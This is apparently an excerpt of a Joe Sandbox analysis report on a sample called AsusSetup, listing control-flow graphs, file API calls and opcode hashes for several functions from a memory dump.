                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 229127750f2d1745c43f1d4e1443995d50311d9be46bfca75b19e9698ce255bd
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d156e8ca4c41563d96fdabb348850d9d572b5e74f636aeb042e4b367f769332e
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 229127750f2d1745c43f1d4e1443995d50311d9be46bfca75b19e9698ce255bd
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5421F83191CB498AD7A65B28985C33966DCF785329F0C426AD417CA162DF6F8502F382
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068B33 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 357 2068b33-2068b43 WriteFile 358 2068b45-2068b4e 357->358 359 2068b50 358->359 360 2068b7b-2068b83 358->360 359->360 361 2068b52-2068f55 SetFilePointerEx 359->361 362 2068c46 360->362 363 2068fab-2068fb7 SetFilePointerEx 360->363 361->358 368 2068f5b 361->368 363->362 364 2068fbd-206910c 363->364 369 2069112 364->369 370 20689b8-20689c3 call 206a380 364->370 372 2069162-2069168 368->372 373 2068f61 368->373 369->370 374 2069118 369->374 377 20689c5-2068f69 370->377 378 20689ac-20689af 370->378 380 2075d2a 372->380 373->372 376 2068f67 373->376 374->374 379 2068f17-2068f3a call 2069180 376->379 377->378 384 2068f6f-2068f7b call 20699f0 377->384 378->362 379->380 380->380 390 2068f81 384->390 391 2068dcc-2068dd8 384->391 390->391 392 2068f87-2068f8a 390->392 393 2068dda 391->393 394 2068e2b-2068e37 call 206d590 391->394 392->363 393->394 395 2068ddc-2068de3 393->395 394->379 395->394
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$PointerWrite
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 539440098-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b21e8b6553e46795974f418cbd0263c8cc51ea9ee3ec7bdaea8ef613bb22301b
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96d675477f5884ca1f21a6f8044b01c34adb70bd1f4ac458339bad4b2e7f88fe
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1F0C86061DB054EDBAF9768186C33D36D3DBC9264B0DC11A9557D2241DF35444EF223
                                                                                                                                                                                                                                                                                                                                                                                          Function 02069180 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 399 2069180-20693a0 401 20693a2 399->401 402 20693f9-206943b 399->402 401->402 404 20693a4 401->404 405 20691d3-20691d6 402->405 406 2069441 402->406 409 20693a7 404->409 408 2069458-20694ac 405->408 406->405 407 2069447-2069449 406->407 412 206944b-206944e 407->412 408->412 423 20694ae 408->423 410 20691f0-20691f2 409->410 411 20693ad-20693b1 409->411 415 2069256-2069259 410->415 416 20691f4 410->416 413 206936a-2069377 411->413 412->408 419 20692c6 415->419 420 206925b-2069275 415->420 418 206931b-206931e 416->418 424 20692e4 call 20972f4 418->424 421 20693c5-20693cd 419->421 422 20692cc-20692d4 SetFilePointerEx 419->422 420->419 430 2069277-206927d 420->430 421->418 422->418 426 20692d6 422->426 428 20694b4 423->428 429 206937d-206938c call 2066150 423->429 436 20692e9 424->436 434 20692f7-2069305 426->434 428->429 431 20694ba-20694c7 428->431 429->412 445 2069392-2069394 429->445 432 2069250 430->432 433 206927f-2069327 430->433 450 20693e3 431->450 451 20691e0-20691e4 431->451 432->415 432->418 447 20692db-20692de 433->447 448 2069329 433->448 439 206930b 434->439 440 2069478-206947c 434->440 436->412 442 20692ef 436->442 439->440 444 2069311 439->444 452 2069485-206949a call 2066250 440->452 442->412 446 20692f5 442->446 446->434 447->422 448->447 449 206932b-2069335 448->449 449->452 455 20693e5 450->455 456 206941c 450->456 453 20691e6 451->453 454 2069207-20693bd 451->454 465 20694a0 452->465 466 206933a 452->466 453->454 458 20691e8-20691ef 453->458 454->421 455->456 459 20693e7-20693f6 455->459 463 20692b8-20692ba 456->463 464 2069359-206935d 456->464 458->410 459->402 469 20692c0 463->469 470 20691fa-206940e 463->470 464->413 465->466 471 20694a6 465->471 467 2069340-2069343 466->467 468 206928b-2069292 466->468 468->410 472 2069298 468->472 469->419 469->470 470->449 475 2069414 470->475 472->409 475->449 476 206941a 475->476 476->456
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: fedb90c313120705c623668376f457cdfd63b1a861b958993c85052519c387b1
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3ba4888de5e34b0f247bdab747720d00bb713960e0127bfab41d569d9c6feee8
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fedb90c313120705c623668376f457cdfd63b1a861b958993c85052519c387b1
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A51283050C75E8FCBA74B64889C67E3BE1EB42628F0D416AD857CBDE5DB344506F222
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068690 Relevance: 1.6, APIs: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 477 2068690-2068693 478 2068740-2068764 477->478 479 2068699 477->479 483 20686a1-2068703 call 2065df0 478->483 484 206876a 478->484 479->478 481 206869f 479->481 482 206d890-206d89d 481->482 481->483 485 206d7d3-206d7d9 482->485 486 206d8a3 482->486 494 2068708-206870b 483->494 484->483 488 2068770-2068772 484->488 490 206d84a-206d850 SetFilePointerEx 485->490 493 20721da-20721e1 486->493 491 2068774 call 2065df0 488->491 499 2068756-206875c 491->499 494->491 498 20686e5 494->498 498->491 500 20686eb 498->500 501 2068716-206871b call 2065df0 call 206ec30 499->501 502 206875e 499->502 500->493 503 20686ed-2068791 500->503 518 20686d4 501->518 502->501 504 2068760 502->504 513 2068710 503->513 514 206873a-206873b 503->514 511 2068720-2068786 504->511 511->503 519 20686c2-206872e 511->519 513->514 517 2068712-2068714 513->517 517->501 520 20686d6-2068734 518->520 521 2068730-20687a8 call 2081520 518->521 519->503 519->521 520->521 526 2068736-2068738 520->526 521->511 528 20687ae 521->528 526->514 528->511 529 20687b4-20687da 528->529 531 20687cf 529->531 532 20687dc-20687e7 529->532 533 20687cc 532->533 534 20687e9 532->534 533->531 534->533
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e2a793accb0e6397573d73c4262dc82dd6e5ea9bfc75c8fe5f6edbd430c81e7c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 32337a60dce016dbb58bae6b66af4db1a73e43228a4dddfebe17a133b31712b7
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2a793accb0e6397573d73c4262dc82dd6e5ea9bfc75c8fe5f6edbd430c81e7c
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4141F721A1DB498FD7E78B28841C775BBE1FB59208F48C29BD04AC7561EB29C48CF741
                                                                                                                                                                                                                                                                                                                                                                                          Function 0206A380 Relevance: 1.6, APIs: 1, Instructions: 86COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 536 206a380 537 206a386 536->537 538 206a4de-206a4e6 536->538 537->538 541 206a38c 537->541 539 206a5c4-206a60b 538->539 540 206a4ec-206a62d 538->540 546 206a62f 539->546 547 206a60d 539->547 540->539 540->546 544 206a392-206a39d 541->544 545 207ca7b-207ca83 541->545 548 206a507-206a50d 544->548 549 206a3a3-206a3af 544->549 551 206a65a-206a660 546->551 547->546 550 206a60f-206a615 547->550 552 206a513 548->552 553 206a64e SetFilePointerEx 548->553 559 206a455-206a457 549->559 554 206a694-206a6a0 551->554 555 206a662 551->555 552->553 556 206a519 552->556 553->551 554->545 561 206a67b-206a681 555->561 558 206a591-206a596 call 206a9d0 556->558 565 206a5ad 558->565 560 206a45d-206a466 559->560 559->561 560->558 563 206a46c 560->563 564 206a687-206a68a 561->564 561->565 563->558 567 206a472 563->567 564->565 570 206a690-206a692 564->570 565->539 567->559 570->554
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: a56446c4e470bf6b7c3ee6f36cbd9dcf94501d6e54935f9ea76e47303719afa8
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 34f8cead0f1ff5ae53d79278c5498bf4892d3923d6664dd3ea9a3ae3d6fb9f8d
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a56446c4e470bf6b7c3ee6f36cbd9dcf94501d6e54935f9ea76e47303719afa8
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D721E151B0D3854FDBA7B628190C33A7FE49F57028B0841AAE887FA692E7058805F262
                                                                                                                                                                                                                                                                                                                                                                                          Function 0206919A Relevance: 1.6, APIs: 1, Instructions: 58fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 571 206919a-20691a5 ReadFile 572 20692e4 call 20972f4 571->572 573 2069421 571->573 577 20692e9 572->577 575 2069427 573->575 576 206931b-206931e 573->576 578 20694be-20694c7 575->578 579 206942d 575->579 576->572 581 20692ef 577->581 582 206944b-206944e 577->582 584 20693e3 578->584 585 20691e0-20691e4 578->585 579->578 583 2069433 579->583 581->582 586 20692f5 581->586 588 2069458-20694ac 582->588 587 2069439-206943b 583->587 591 20693e5 584->591 592 206941c 584->592 589 20691e6 585->589 590 2069207-20693bd 585->590 593 20692f7-2069305 586->593 594 20691d3-20691d6 587->594 595 2069441 587->595 588->582 621 20694ae 588->621 589->590 597 20691e8-20691ef 589->597 609 20693c5-20693cd 590->609 591->592 598 20693e7-206940a 591->598 603 20692b8-20692ba 592->603 604 2069359-206935d 592->604 599 206930b 593->599 600 2069478-206947c 593->600 594->588 595->594 596 2069447-2069449 595->596 596->582 606 20691f0-20691f2 597->606 598->587 599->600 608 2069311 599->608 615 2069485-206949a call 2066250 600->615 610 20692c0 603->610 611 20691fa-206940e 603->611 617 206936a-2069377 604->617 613 2069256-2069259 606->613 614 20691f4 606->614 609->576 610->611 616 20692c6 610->616 631 2069414 611->631 632 206932b-2069335 611->632 613->616 620 206925b-2069275 613->620 614->576 633 20694a0 615->633 634 206933a 615->634 616->609 622 20692cc-20692d4 SetFilePointerEx 616->622 620->616 635 2069277-206927d 620->635 626 20694b4 621->626 627 206937d-206938c call 2066150 621->627 622->576 629 20692d6 622->629 626->627 628 20694ba-20694bc 626->628 627->582 645 2069392-2069394 627->645 628->578 629->593 631->632 641 206941a 631->641 632->615 633->634 642 20694a6 633->642 638 2069340-2069343 634->638 639 206928b-2069292 634->639 636 2069250 635->636 637 206927f-2069327 635->637 636->576 636->613 647 20692db-20692de 637->647 648 2069329 637->648 639->606 644 2069298-20693a7 639->644 641->592 644->606 649 20693ad-20693b1 644->649 647->622 648->632 648->647 649->617
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FileRead
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 436d7939820a4c409f8454a4c22baa9c3b8d2b2b4d59e08646bb7d558b650eb3
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6e4a11c51c7de108c8e94544f690650c6cbe43b965ad23e87ae211a363a688ba
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 436d7939820a4c409f8454a4c22baa9c3b8d2b2b4d59e08646bb7d558b650eb3
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9A01F52191E38D4FCBA70AB90C9D5783FA1AD4612870D01ABD4828BDF3D739450AF327
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068E1A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 650 2068e1a-2068e1b 651 2068e21 650->651 652 2068b6f 650->652 651->652 654 2068e27-2068e29 651->654 653 2068f41-2068f55 SetFilePointerEx 652->653 655 2068b45-2068b4e 653->655 656 2068f5b 653->656 657 2068e2b-2068e37 call 206d590 654->657 658 2068b50 655->658 659 2068b7b-2068b83 655->659 660 2069162-2069168 656->660 661 2068f61 656->661 669 2068f17-2068f3a call 2069180 657->669 658->659 663 2068b52-2068b55 658->663 665 2068c46 659->665 666 2068fab-2068fb7 SetFilePointerEx 659->666 670 2075d2a 660->670 661->660 664 2068f67 661->664 663->652 664->669 666->665 668 2068fbd-206910c 666->668 674 2069112 668->674 675 20689b8-20689c3 call 206a380 668->675 669->670 670->670 674->675 678 2069118 674->678 681 20689c5-2068f69 675->681 682 20689ac-20689af 675->682 678->678 681->682 684 2068f6f-2068f7b call 20699f0 681->684 682->665 688 2068f81 684->688 689 2068dcc-2068dd8 684->689 688->689 690 2068f87-2068f8a 688->690 689->657 691 2068dda 689->691 690->666 691->657 692 2068ddc-2068de3 691->692 692->657
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: f06da06f4a02658f6b5d2c9191a2a2c83fc033361b9e7c3f6dfe859081a38f85
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 49d7f538cfbb64dcbced54729d4ab6c6914448f75802d318b38f99076a6a5faa
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f06da06f4a02658f6b5d2c9191a2a2c83fc033361b9e7c3f6dfe859081a38f85
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801D1B090D7898FC7A75B2C485C3397AF2AB42214F18C58A9496CA592DB348C0EF616
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068A0E Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 694 2068a0e-2068a10 695 2068a16 694->695 696 2068ee8-2068ef7 SetFilePointerEx 694->696 695->696 697 2068a1c 695->697 698 2068fec-2068fee 696->698 699 2068efd 696->699 702 2068c46 697->702 700 2068ff4 698->700 701 2068d1b 698->701 699->698 703 2068f03 699->703 700->701 704 2068ffa-2069126 call 206cda0 700->704 701->702 705 2068d21 701->705 703->698 708 2068d8e 704->708 711 206912c 704->711 705->708 708->702 710 2068d94-20690a2 708->710 711->708 713 2069132-2069135 711->713 713->702 714 206913b-2069142 713->714
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8fb5c28e5d1c9eb1e11ce46e88e0860ba3941c2b0ac46eca638127c2fbbfd38b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5692533eb42e14e2587a994d910d00ea39f57e32788bd5803209c9bcb530baf3
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fb5c28e5d1c9eb1e11ce46e88e0860ba3941c2b0ac46eca638127c2fbbfd38b
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F0907592EB1A8ADBFA8B98441D77A73D5FF51264F48C6168C4386114EB30C01CF993
                                                                                                                                                                                                                                                                                                                                                                                          Function 02069625 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 802 2069625-2069656 SetFilePointerEx 803 20696fd 802->803 804 20697c5 803->804 805 2069703 803->805 807 20696ef-20696f7 804->807 808 20697cb 804->808 806 2069979-2069982 805->806 810 2069734-2069735 806->810 811 2069988 806->811 807->803 809 2069759 807->809 808->807 812 20697d1 808->812 815 206975f 809->815 816 206959c-20695a2 809->816 813 206973e 810->813 811->810 814 206998e 811->814 812->813 813->804 814->814 815->816 818 2069765-2069783 815->818 817 206954a-2069556 SetFilePointerEx 816->817 819 20698c5 817->819 823 2069785 818->823 824 206973f-2069754 call 206ea60 818->824 821 20698c7-20698d0 819->821 822 206985c-206985f 819->822 825 20698d6 821->825 826 2069968-2069970 call 206eb00 821->826 827 2069847-206984f 822->827 828 2069861 822->828 823->824 830 2069787 823->830 842 2069874 824->842 825->826 833 20698dc 825->833 826->806 826->822 831 2069855 827->831 832 2069512-206951d 827->832 834 2069867 828->834 835 2069570 828->835 840 20697b2 830->840 831->840 838 2069523 832->838 839 206986d 832->839 845 2069913-20699d0 833->845 834->835 834->839 841 2069634-2069637 call 20972f4 835->841 838->839 844 2069529 838->844 839->842 840->804 851 206963c 841->851 842->845 846 206987a 842->846 848 2078d17-2078d1c 844->848 855 20698b4 845->855 856 20699a5 845->856 846->845 850 2069880-2069882 846->850 853 2069884 850->853 851->827 854 2069642 851->854 854->827 857 2069648-2069656 SetFilePointerEx 854->857 855->853 859 20698b6 855->859 856->855 858 20699ab 856->858 857->803 858->826 860 20698bc 859->860 861 2069718 859->861 860->819 861->810
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f5abb326ab5c89d462832d41a12cb577f4c98dc54bd39c8b030a5cdd9b171b28
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44E0921024E3C98EC3538B38684C7F93EF55F02668F08068EB495CA4E2DB3A8809E711
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068F40 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 760 2068f40-2068f55 SetFilePointerEx 761 2068b45-2068b4e 760->761 762 2068f5b 760->762 763 2068b50 761->763 764 2068b7b-2068b83 761->764 765 2069162-2069168 762->765 766 2068f61 762->766 763->764 767 2068b52-2068b6f 763->767 769 2068c46 764->769 770 2068fab-2068fb7 SetFilePointerEx 764->770 774 2075d2a 765->774 766->765 768 2068f67 766->768 777 2068f41-2068f55 SetFilePointerEx 767->777 773 2068f17-2068f3a call 2069180 768->773 770->769 771 2068fbd-206910c 770->771 779 2069112 771->779 780 20689b8-20689c3 call 206a380 771->780 773->774 774->774 777->761 777->762 779->780 783 2069118 779->783 786 20689c5-2068f69 780->786 787 20689ac-20689af 780->787 783->783 786->787 789 2068f6f-2068f7b call 20699f0 786->789 787->769 793 2068f81 789->793 794 2068dcc-2068dd8 789->794 793->794 795 2068f87-2068f8a 793->795 796 2068dda 794->796 797 2068e2b-2068e37 call 206d590 794->797 795->770 796->797 798 2068ddc-2068de3 796->798 797->773 798->797
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a95e33520abc4f6833332694003994b99d5276821e6221bc746919f8c5cdc176
                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6E04F6090E7885BD7BB5738484C3BD6EE2AB022A4F588546E891C9496CB348C0AE616
                                                                                                                                                                                                                                                                                                                                                                                          Function 02068BA6 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 715 2068ba6-2069053 717 2068b33-2068b43 WriteFile 715->717 718 2069059 715->718 719 2068b45-2068b4e 717->719 718->718 720 2068b50 719->720 721 2068b7b-2068b83 719->721 720->721 722 2068b52-2068f55 SetFilePointerEx 720->722 723 2068c46 721->723 724 2068fab-2068fb7 SetFilePointerEx 721->724 722->719 729 2068f5b 722->729 724->723 725 2068fbd-206910c 724->725 730 2069112 725->730 731 20689b8-20689c3 call 206a380 725->731 733 2069162-2069168 729->733 734 2068f61 729->734 730->731 735 2069118 730->735 738 20689c5-2068f69 731->738 739 20689ac-20689af 731->739 741 2075d2a 733->741 734->733 737 2068f67 734->737 735->735 740 2068f17-2068f3a call 2069180 737->740 738->739 745 2068f6f-2068f7b call 20699f0 738->745 739->723 740->741 741->741 751 2068f81 745->751 752 2068dcc-2068dd8 745->752 751->752 753 2068f87-2068f8a 751->753 754 2068dda 752->754 755 2068e2b-2068e37 call 206d590 752->755 753->724 754->755 756 2068ddc-2068de3 754->756 755->740 756->755
                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1743006726.0000000002060000.00000040.00001000.00020000.00000000.sdmp, Offset: 02060000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2060000_AsusSetup.jbxd
